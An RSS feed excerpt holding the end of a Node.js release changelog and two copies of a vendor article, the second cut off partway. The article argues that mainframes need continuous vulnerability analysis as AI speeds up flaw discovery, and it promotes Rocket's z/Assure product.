<li>[<a href="https://github.com/nodejs/node/commit/82ca02db3c"><code>82ca02db3c</code></a>] - <strong>meta</strong>: bump actions/setup-python from 6.3.0 to 7.0.0 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64932" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64932/hovercard">#64932</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/848e2287f2"><code>848e2287f2</code></a>] - <strong>meta</strong>: bump github/codeql-action/init from 4.36.2 to 4.37.3 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64931" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64931/hovercard">#64931</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae8ad3b17b"><code>ae8ad3b17b</code></a>] - <strong>meta</strong>: bump Mozilla-Actions/sccache-action from 0.0.10 to 0.0.11 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64930" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64930/hovercard">#64930</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b359cfa4c"><code>0b359cfa4c</code></a>] - <strong>meta</strong>: bump cachix/install-nix-action from 31.10.6 to 31.11.0 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64929" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64929/hovercard">#64929</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b4f980f4c"><code>3b4f980f4c</code></a>] - <strong>meta</strong>: bump github/codeql-action/upload-sarif from 4.36.2 to 4.37.3 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64927" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64927/hovercard">#64927</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d7ee9e9ea7"><code>d7ee9e9ea7</code></a>] - <strong>meta</strong>: bump step-security/harden-runner from 2.19.4 to 2.20.0 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64926" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64926/hovercard">#64926</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7e80bbaaa9"><code>7e80bbaaa9</code></a>] - <strong>meta</strong>: bump ossf/scorecard-action from 2.4.3 to 2.4.4 (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64925" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64925/hovercard">#64925</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/915cabbfcf"><code>915cabbfcf</code></a>] - <strong>meta</strong>: remove node_crates .gitignore (René) <a href="https://github.com/nodejs/node/pull/64779" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64779/hovercard">#64779</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8e03c54347"><code>8e03c54347</code></a>] - <strong>meta</strong>: add <a class="team-mention js-team-mention notranslate" data-error-text="Failed to load team members" data-id="2227291" data-permission-text="Team members are private" data-url="/orgs/nodejs/teams/url/members" data-hovercard-type="team" data-hovercard-url="/orgs/nodejs/teams/url/hovercard" href="https://github.com/orgs/nodejs/teams/url">@nodejs/url</a> as codeowner for node_url_pattern.* (Efe Karasakal) <a href="https://github.com/nodejs/node/pull/64737" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64737/hovercard">#64737</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11c2f9c642"><code>11c2f9c642</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>module</strong>: implement Symbol.dispose in ModuleHooks (Remco Haszing) <a href="https://github.com/nodejs/node/pull/63928" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63928/hovercard">#63928</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fffd8a76d0"><code>fffd8a76d0</code></a>] - <strong>net</strong>: support TCP handle transfer on Windows (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64460" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64460/hovercard">#64460</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe9e0dbdc2"><code>fe9e0dbdc2</code></a>] - <strong>net</strong>: support AF_UNIX paths in net.BoundSocket (Guy Bedford) <a href="https://github.com/nodejs/node/pull/64399" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64399/hovercard">#64399</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/eb61b7ee1e"><code>eb61b7ee1e</code></a>] - <strong>permission</strong>: add unique warning codes (David Evans) <a href="https://github.com/nodejs/node/pull/64414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64414/hovercard">#64414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/999a928822"><code>999a928822</code></a>] - <strong>permission</strong>: support v8.setHeapSnapshotNearHeapLimit (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/64808" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64808/hovercard">#64808</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7de3d095b6"><code>7de3d095b6</code></a>] - <strong>quic</strong>: fix stop sending behaviour &amp; callback (Tim Perry) <a href="https://github.com/nodejs/node/pull/64710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64710/hovercard">#64710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6289398bb2"><code>6289398bb2</code></a>] - <strong>quic</strong>: fix coverage comment typo (Jungwon Sohn) <a href="https://github.com/nodejs/node/pull/64486" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64486/hovercard">#64486</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/01510dc759"><code>01510dc759</code></a>] - <strong>quic</strong>: fix segfault after fragmented client hello (Tim Perry) <a href="https://github.com/nodejs/node/pull/64720" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64720/hovercard">#64720</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/dcc348af97"><code>dcc348af97</code></a>] - <strong>quic</strong>: serialize stream reset code as string (한만욱) <a href="https://github.com/nodejs/node/pull/64577" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64577/hovercard">#64577</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c25b8e3331"><code>c25b8e3331</code></a>] - <strong>readline</strong>: reduce createInterface overhead (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64585" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64585/hovercard">#64585</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/14e802d1cd"><code>14e802d1cd</code></a>] - <strong>sqlite</strong>: invalidate sessions when closing database (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64783" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64783/hovercard">#64783</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/279547b7da"><code>279547b7da</code></a>] - <strong>sqlite</strong>: check database state before calling SQLite (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64812" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64812/hovercard">#64812</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb86521a42"><code>bb86521a42</code></a>] - <strong>sqlite</strong>: fix crash when a session outlives its database (Mohamed Sayed) <a href="https://github.com/nodejs/node/pull/63797" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63797/hovercard">#63797</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/870f4997e7"><code>870f4997e7</code></a>] - <strong>sqlite</strong>: fix use-after-free in Exec() and ApplyChangeset() (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64535" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64535/hovercard">#64535</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a8ec5a9df7"><code>a8ec5a9df7</code></a>] - <strong>src</strong>: fix perfetto build on GetTraceFilePath (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64721" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64721/hovercard">#64721</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6cd643acaa"><code>6cd643acaa</code></a>] - <strong>src</strong>: implement MemoryRetainer protocol for ByteSource (Filip Skokan) <a href="https://github.com/nodejs/node/pull/64660" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64660/hovercard">#64660</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8725e56928"><code>8725e56928</code></a>] - <strong>src</strong>: fix crash when writing odd-length hex string via Writev (RajeshKumar11) <a href="https://github.com/nodejs/node/pull/63658" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63658/hovercard">#63658</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e018f9a4a1"><code>e018f9a4a1</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>src</strong>: add perfetto trace agent (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0611d443ab"><code>0611d443ab</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>src</strong>: rename legacy trace event headers (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2897cc1d93"><code>2897cc1d93</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>src</strong>: fix trace macro compatibility (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64565/hovercard">#64565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d4d7172e10"><code>d4d7172e10</code></a>] - <strong>src</strong>: avoid using ToLocalChecked in crypto_hash (James M Snell) <a href="https://github.com/nodejs/node/pull/64668" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64668/hovercard">#64668</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/53b7d48b47"><code>53b7d48b47</code></a>] - <strong>src</strong>: fix libuv assertion on windows (liuxingbaoyu) <a href="https://github.com/nodejs/node/pull/61999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/61999/hovercard">#61999</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69d10ed021"><code>69d10ed021</code></a>] - <strong>src,test</strong>: disable trace events tests when perfetto is enabled (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/64721" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64721/hovercard">#64721</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1b0597b4ef"><code>1b0597b4ef</code></a>] - <strong>stream</strong>: cut per-chunk allocations in pipeTo (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64890" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64890/hovercard">#64890</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2632d606bb"><code>2632d606bb</code></a>] - <strong>stream</strong>: preserve push signal abort reason (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64798" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64798/hovercard">#64798</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d5358a75bc"><code>d5358a75bc</code></a>] - <strong>stream</strong>: skip zero-byte broadcast writes (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64772" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64772/hovercard">#64772</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/796c896fb4"><code>796c896fb4</code></a>] - <strong>stream</strong>: honor AbortSignal in Writer.end() (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64727" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64727/hovercard">#64727</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ff12b8e22e"><code>ff12b8e22e</code></a>] - <strong>stream</strong>: use validateString for consumer encoding (Jungwon Sohn) <a href="https://github.com/nodejs/node/pull/64754" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64754/hovercard">#64754</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cfad2efb06"><code>cfad2efb06</code></a>] - <strong>stream</strong>: use the ring buffer for pending BYOB pull-into descriptors (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64818" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64818/hovercard">#64818</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe06bf56dc"><code>fe06bf56dc</code></a>] - <strong>stream</strong>: fix uncatchable error closing half-open Duplex.toWeb() writable (Mohamed Sayed) <a href="https://github.com/nodejs/node/pull/64161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64161/hovercard">#64161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f2919dbb83"><code>f2919dbb83</code></a>] - <strong>test</strong>: unflake debugger and REPL tests (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64718" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64718/hovercard">#64718</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a1c29174e8"><code>a1c29174e8</code></a>] - <strong>test</strong>: ensure assertions are reached on all tests (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/64716" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64716/hovercard">#64716</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9e596f8e5"><code>b9e596f8e5</code></a>] - <strong>test</strong>: reuse ffi.suffix instead of reimplementing it (Seongeun Lee) <a href="https://github.com/nodejs/node/pull/64840" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64840/hovercard">#64840</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c816918e14"><code>c816918e14</code></a>] - <strong>test</strong>: remove test-repl-user-error-handler from flaky (avivkeller) <a href="https://github.com/nodejs/node/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64631/hovercard">#64631</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9d2f10ec54"><code>9d2f10ec54</code></a>] - <strong>test</strong>: update WPT for url to 4832db4761 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64829/hovercard">#64829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75b80d0b7b"><code>75b80d0b7b</code></a>] - <strong>test</strong>: update WPT for url to b63305b743 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/64790" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64790/hovercard">#64790</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9a139b3c86"><code>9a139b3c86</code></a>] - <strong>test</strong>: cover worker throwing primitive values (varshitha) <a href="https://github.com/nodejs/node/pull/64365" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64365/hovercard">#64365</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/796acc8920"><code>796acc8920</code></a>] - <strong>test</strong>: mark test-repl-user-error-handler as flaky (Aviv Keller) <a href="https://github.com/nodejs/node/pull/64612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64612/hovercard">#64612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a646319f61"><code>a646319f61</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>test_runner</strong>: add support for --test-coverage-include-all (avivkeller) <a href="https://github.com/nodejs/node/pull/64830" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64830/hovercard">#64830</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4368303e01"><code>4368303e01</code></a>] - <strong>test_runner</strong>: wait for filtered suite build (semimikoh) <a href="https://github.com/nodejs/node/pull/64208" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64208/hovercard">#64208</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/70d11241a3"><code>70d11241a3</code></a>] - <strong>test_runner</strong>: convert to uint during deserialization (Aviv Keller) <a href="https://github.com/nodejs/node/pull/64706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64706/hovercard">#64706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/cafe7bffcc"><code>cafe7bffcc</code></a>] - <strong>tls</strong>: fix SNICallback certificate selection (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64700" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64700/hovercard">#64700</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ee05ec40f"><code>9ee05ec40f</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64928" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64928/hovercard">#64928</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5f4b859932"><code>5f4b859932</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.7 to 5.0.9 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/64904" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64904/hovercard">#64904</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5ced907b3"><code>b5ced907b3</code></a>] - <strong>tools</strong>: use 'readonly' for EventSource global (Honey Tyagi) <a href="https://github.com/nodejs/node/pull/64787" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64787/hovercard">#64787</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd4460e34e"><code>fd4460e34e</code></a>] - <strong>typings</strong>: add heap_utils internalBinding types (Donghoon Kang) <a href="https://github.com/nodejs/node/pull/64816" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64816/hovercard">#64816</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3bc0ee0492"><code>3bc0ee0492</code></a>] - <strong>typings</strong>: remove isDataView from types binding (Archkon) <a href="https://github.com/nodejs/node/pull/64738" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64738/hovercard">#64738</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/236d7ca965"><code>236d7ca965</code></a>] - <strong>url</strong>: create URLPattern result properties in WebIDL order (Archkon) <a href="https://github.com/nodejs/node/pull/64733" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64733/hovercard">#64733</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3def577ab4"><code>3def577ab4</code></a>] - <strong>v8</strong>: report minor mark-sweep in GCProfiler (Archkon) <a href="https://github.com/nodejs/node/pull/64688" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64688/hovercard">#64688</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5293abff73"><code>5293abff73</code></a>] - <strong>vfs</strong>: speed up recursive readdir test setup (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64813" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64813/hovercard">#64813</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4345185496"><code>4345185496</code></a>] - <strong>vfs</strong>: make lchown update symlink metadata (Trivikram Kamat) <a href="https://github.com/nodejs/node/pull/64573" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64573/hovercard">#64573</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b6ab546de5"><code>b6ab546de5</code></a>] - <strong>wasm</strong>: register missing SetURL function (Archkon) <a href="https://github.com/nodejs/node/pull/64679" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64679/hovercard">#64679</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f322870bd1"><code>f322870bd1</code></a>] - <strong>zlib</strong>: validate pledgedSrcSize as a safe integer (Archkon) <a href="https://github.com/nodejs/node/pull/64604" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64604/hovercard">#64604</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44042c20d4"><code>44042c20d4</code></a>] - <strong>zlib</strong>: accept ArrayBuffer dictionary in Zstd (Ryuhei Shima) <a href="https://github.com/nodejs/node/pull/64599" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64599/hovercard">#64599</a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why mainframe security requires continuous verification]]></title>
<description><![CDATA[The mainframe remains the system of record for many of the world’s largest organizations and some of their most critical data. As of 2025, 71% of Fortune 500 companies still use mainframes, and nearly 97% of banks worldwide rely on IBM mainframe products.



Yet many security programs continue to...]]></description>
<link>https://tsecurity.de/de/3706430/it-security-nachrichten/why-mainframe-security-requires-continuous-verification/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706430/it-security-nachrichten/why-mainframe-security-requires-continuous-verification/</guid>
<pubDate>Wed, 05 Aug 2026 19:33:33 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The mainframe remains the system of record for many of the world’s largest organizations and some of their most critical data. As of 2025, <a href="https://thefinancialbrand.com/news/banking-technology/banking-legacy-systems-are-under-siege-and-the-threat-is-surprisingly-human-191575" target="_blank" rel="noreferrer noopener">71% of Fortune 500 companies still use mainframes, and nearly 97% of banks worldwide rely on IBM mainframe products.</a></p>



<p class="wp-block-paragraph">Yet many security programs continue to treat the mainframe differently from the rest of the enterprise. Many organizations still assume the mainframe is inherently secure.</p>



<p class="wp-block-paragraph">Mainframes are designed with strong security controls. But strong controls alone are not enough. Like any critical enterprise system, the mainframe requires continuous verification to ensure those controls are working as intended.</p>



<p class="wp-block-paragraph">Risk can exist anywhere. An overlooked configuration in a z/OS environment can create opportunities for unauthorized access to sensitive systems and data. As the time between vulnerability discovery and exploitation continues to shrink, organizations need greater visibility into risk across the enterprise—including the mainframe.</p>



<p class="wp-block-paragraph"><strong>Myth #1: Mainframes are unbreachable</strong> </p>



<p class="wp-block-paragraph">Can mainframes be breached? Although mainframes are designed with robust security features, no technology platform is immune to risk. The reality is simple: attackers go where the valuable data is stored.</p>



<p class="wp-block-paragraph">The mainframe isn’t isolated from the rest of the enterprise. Mainframes routinely process millions of transactions per day, and high-end systems can process over a million transactions per second in certain workloads. Mainframes are estimated to handle a substantial share of the world’s transactional workloads and credit card processing.</p>



<p class="wp-block-paragraph">As organizations modernize and connect systems across environments, visibility into potential exposure becomes just as important on z/OS as it is everywhere else. Attackers follow opportunity. Wherever valuable data and business-critical assets reside, flaws will attract attention. As organizations adopt hybrid architectures, the number of interconnected systems continues to grow, making identity governance and access assurance increasingly important.</p>



<p class="wp-block-paragraph">The solution is to treat the mainframe as part of the enterprise attack surface and manage risk there the same way you do everywhere else. Mainframe security requires the same continuous visibility organizations expect across the rest of the enterprise.</p>



<p class="wp-block-paragraph"><strong>Myth #2: Specialized systems are too complex for attackers</strong></p>



<p class="wp-block-paragraph">How is AI changing vulnerability discovery? In the past, surfacing exposures on the mainframe required deep expertise that relatively few people had. That complexity made these environments harder to analyze.</p>



<p class="wp-block-paragraph">Recent attention around <a href="https://www.scientificamerican.com/article/what-is-mythos-and-why-are-experts-worried-about-anthropics-ai-model/" target="_blank" rel="noreferrer noopener">Mythos</a>, Anthropic’s highly restricted security research model, has sparked debate about AI’s role in cybersecurity. If security flaws become dramatically easier to find, organizations may have less time to identify and remediate weaknesses before others discover them.</p>



<p class="wp-block-paragraph">The important point isn’t Mythos itself. It’s that identifying exploitable weaknesses is becoming faster, cheaper, and easier.</p>



<p class="wp-block-paragraph">Organizations can no longer assume that complexity will keep attackers at bay. Mainframe security strategies should account for a future in which gaps are discovered faster than ever before.</p>



<p class="wp-block-paragraph">That requires greater visibility into the z/OS environment and the risks it may pose. Continuous analysis helps organizations uncover potential weaknesses early, and the sooner security teams can detect security gaps, the more time they have to fix them.</p>



<p class="wp-block-paragraph"><strong>Myth #3: Annual security assessments are sufficient</strong></p>



<p class="wp-block-paragraph">Why is continuous vulnerability analysis important for mainframe security? Many organizations still rely on periodic configuration assessments, even though today’s threats move much faster than they did when those processes were created. Today’s mainframe environments are constantly evolving, and new weaknesses can emerge between checkpoints long before the next scheduled assessment.</p>



<p class="wp-block-paragraph">Security teams need ongoing visibility into risk, not occasional snapshots. That’s why continuous vulnerability analysis has become a critical component of modern mainframe management, helping teams identify and remediate weaknesses before they escalate into incidents.</p>



<p class="wp-block-paragraph">Organizations have long benefited from the security architecture and integrity of mainframe environments. As vulnerability discovery becomes more efficient, maintaining visibility into those environments becomes increasingly important. Rocket Mainframe Security solutions help organizations build continuous visibility across their z/OS environments and act on it early.</p>



<p class="wp-block-paragraph">For organizations seeking greater visibility across their z/OS environment, <a href="https://www.rocketsoftware.com/en-us/products/z-assure-vulnerability-analysis-program" target="_blank" rel="noreferrer noopener">Rocket z/Assure Vulnerability Analysis Program (VAP)</a> helps identify weaknesses within authorized programs and supports ongoing remediation efforts. VAP helps security teams identify security gaps in software earlier, reducing risk before they affect critical systems.</p>



<p class="wp-block-paragraph"><strong>What continuous mainframe security requires</strong></p>



<ul class="wp-block-list">
<li>Visibility into sensitivities across the z/OS environment</li>



<li>Ongoing validation of security controls</li>



<li>Integration with enterprise risk management processes</li>



<li>Faster identification and remediation of emerging weaknesses</li>



<li>Continuous assessment rather than periodic review</li>
</ul>



<p class="wp-block-paragraph"><strong>The future of mainframe security requires continuous vulnerability analysis</strong></p>



<p class="wp-block-paragraph">Security weaknesses can exist anywhere in the enterprise, and they are being discovered faster than ever before. Detecting risk is getting easier, and organizations should plan accordingly.</p>



<p class="wp-block-paragraph">This is where continuous vulnerability analysis becomes essential. Point-in-time assessments provide a snapshot of risk, while continuous risk analysis helps organizations maintain visibility as systems change.</p>



<p class="wp-block-paragraph">The broader lesson from advanced AI models like Mythos is that vulnerability discovery is accelerating. For organizations that depend on the mainframe, visibility becomes more important as the time between discovery and exploitation shrinks. Organizations that adopt continuous analysis across critical environments will be better positioned to identify and address risk before attackers do.</p>



<p class="wp-block-paragraph"><a href="https://www.rocketsoftware.com/en-us/products/z-assure-vulnerability-analysis-program" target="_blank" rel="noreferrer noopener">Learn more here.</a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why mainframe security requires continuous verification]]></title>
<description><![CDATA[The mainframe remains the system of record for many of the world’s largest organizations and some of their most critical data. As of 2025, 71% of Fortune 500 companies still use mainframes, and nearly 97% of banks worldwide rely on IBM mainframe products.



Yet many security programs continue to...]]></description>
<link>https://tsecurity.de/de/3706417/it-nachrichten/why-mainframe-security-requires-continuous-verification/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706417/it-nachrichten/why-mainframe-security-requires-continuous-verification/</guid>
<pubDate>Wed, 05 Aug 2026 19:31:18 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The mainframe remains the system of record for many of the world’s largest organizations and some of their most critical data. As of 2025, <a href="https://thefinancialbrand.com/news/banking-technology/banking-legacy-systems-are-under-siege-and-the-threat-is-surprisingly-human-191575" target="_blank" rel="noreferrer noopener">71% of Fortune 500 companies still use mainframes, and nearly 97% of banks worldwide rely on IBM mainframe products.</a></p>



<p class="wp-block-paragraph">Yet many security programs continue to treat the mainframe differently from the rest of the enterprise. Many organizations still assume the mainframe is inherently secure.</p>



<p class="wp-block-paragraph">Mainframes are designed with strong security controls. But strong controls alone are not enough. Like any critical enterprise system, the mainframe requires continuous verification to ensure those controls are working as intended.</p>



<p class="wp-block-paragraph">Risk can exist anywhere. An overlooked configuration in a z/OS environment can create opportunities for unauthorized access to sensitive systems and data. As the time between vulnerability discovery and exploitation continues to shrink, organizations need greater visibility into risk across the enterprise—including the mainframe.</p>



<p class="wp-block-paragraph"><strong>Myth #1: Mainframes are unbreachable</strong> </p>



<p class="wp-block-paragraph">Can mainframes be breached? Although mainframes are designed with robust security features, no technology platform is immune to risk. The reality is simple: attackers go where the valuable data is stored.</p>



<p class="wp-block-paragraph">The mainframe isn’t isolated from the rest of the enterprise. Mainframes routinely process millions of transactions per day, and high-end systems can process over a million transactions per second in certain workloads. Mainframes are estimated to handle a substantial share of the world’s transactional workloads and credit card processing.</p>



<p class="wp-block-paragraph">As organizations modernize and connect systems across environments, visibility into potential exposure becomes just as important on z/OS as it is everywhere else. Attackers follow opportunity. Wherever valuable data and business-critical assets reside, flaws will attract attention. As organizations adopt hybrid architectures, the number of interconnected systems continues to grow, making identity governance and access assurance increasingly important.</p>



<p class="wp-block-paragraph">The solution is to treat the mainframe as part of the enterprise attack surface and manage risk there the same way you do everywhere else. Mainframe security requires the same continuous visibility organizations expect across the rest of the enterprise.</p>



<p class="wp-block-paragraph"><strong>Myth #2: Specialized systems are too complex for attackers</strong></p>



<p class="wp-block-paragraph">How is AI changing vulnerability discovery? In the past, surfacing exposures on the mainframe required deep expertise that relatively few people had. That complexity made these environments harder to analyze.</p>



<p class="wp-block-paragraph">Recent attention around <a href="https://www.scientificamerican.com/article/what-is-mythos-and-why-are-experts-worried-about-anthropics-ai-model/" target="_blank" rel="noreferrer noopener">Mythos</a>, Anthropic’s highly restricted security research model, has sparked debate about AI’s role in cybersecurity. If security flaws become dramatically easier to find, organizations may have less time to identify and remediate weaknesses before others discover them.</p>



